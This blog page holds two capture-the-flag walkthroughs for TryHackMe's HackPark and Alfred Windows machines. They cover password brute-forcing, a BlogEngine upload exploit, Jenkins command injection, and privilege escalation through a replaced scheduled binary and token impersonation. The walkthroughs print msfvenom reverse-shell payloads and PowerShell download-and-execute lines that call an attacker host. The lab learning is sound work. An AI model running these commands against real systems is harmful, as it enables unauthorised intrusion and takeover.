Skip to content

Month: June 2021

THM – HackPark: Hacking Windows with Hydra, RCE & WinPEAS

Navigate to the Application and explore the features. You will notice a Login page.

We need to identify a possible username for brute-forcing the credentials. When we look at the blog post, we can see an author named “admin” or “administrator”.

Using Burp Intruder, we can brute-force the password using Seclist’s common credentials:


We found the password: 1qaz2wsx

When we login, we can identify the version of blogengine.

Search for exploits in exploit-db. Choose the verified exploit:

Save the file as PostView.acsx

Once the file is uploaded, we can see the file in File manager.

Start a nc listener in the attacker machine: nc -lvnp 4444

Navigate to <Target Machine>/?theme=../../App_Data/files

Once you gain initial access to the server, we will pivot from netcat to a more stable shell.

Generate a reverse shell exe;

msfvenom -p windows/shell_reverse_tcp LHOST=[Attacker IP] LPORT=3333 -f exe -o shell-x86.exe

Download the shell and Winpeas to C:\Windows\Temp\ (this is world writable).

We can run winPEAS.bat and we can see the uncommon service “Windows Scheduler” running.

cd to C:\PROGRA~2\SYSTEM~1

Examine the files in the directory to see if there are any useful information.

In the Events folder, we can see that Message.exe is being executed by Administrator periodically.

Replace the Message.exe with another reverse shell payload. Rename the existing Message.exe to old_message.exe

In Attacker machine, generate the reverse shell:

msfvenom -p windows/shell_reverse_tcp LHOST=[ATTACKER IP] LPORT=5555 -f exe -o Message.exe

Download the Message.exe (reverse shell) to the folder:

powershell -c wget "http://[ATTACKER IP]/Message.exe" -outfile "Message.exe"

cd C:\Users\Administrator\Desktop and we can see the root.txt flag.

THM – Alfred: Exploiting Jenkins



Run nmap [Target Machine IP]

There are 3 ports open (TCP connect).

Open [Target Machine IP]:80 and [Target Machine IP]:8080.

[Target Machine IP]:8080 is a login page to Jenkins. Google for the default password of Jenkins (admin:admin).

Once you login, you will see a build. If you look at the build job, you can see that this is a Windows machine. Configure the job and insert the reverse shell to the build command:

powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port

Download this powershell in attacker machine and host the file with python server (port 8888).

Run nc -lvnp 4444 in attacker machine. Then trigger a build in this job.

We will get a shell from the Target machine. Look for the user.txt (usually it is in the one of the user’s document or desktop folder).


e text contains:

Upgrade shell

Generate a payload

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[ATTACKER IP] LPORT=3333 -f exe -o shell.exe

Open the msfconsole in attacker machine and run these commands (line by line):

use exploit/multi/handler 
set PAYLOAD windows/meterpreter/reverse_tcp 
set LPORT 3333

Download the shell.exe into the Target machine using Jenkins.

powershell "(New-Object System.Net.WebClient).Downloadfile('http://[ATTACKER IP]:8888/shell.exe','shell.exe')"

In the machine, run Start-Process shell.exe to upgrade the shell.

If this is successful, you will see the output in the msfconsole

Privilege Escalation with Access Token

Find out what is the privilege of the user using whoami /priv

In msfconsole, load incognito and run list_tokens -g to find out the available tokens.

Run impersonate_token “BUILTIN\Administrators” command to impersonate the Administrators token


Start a shell.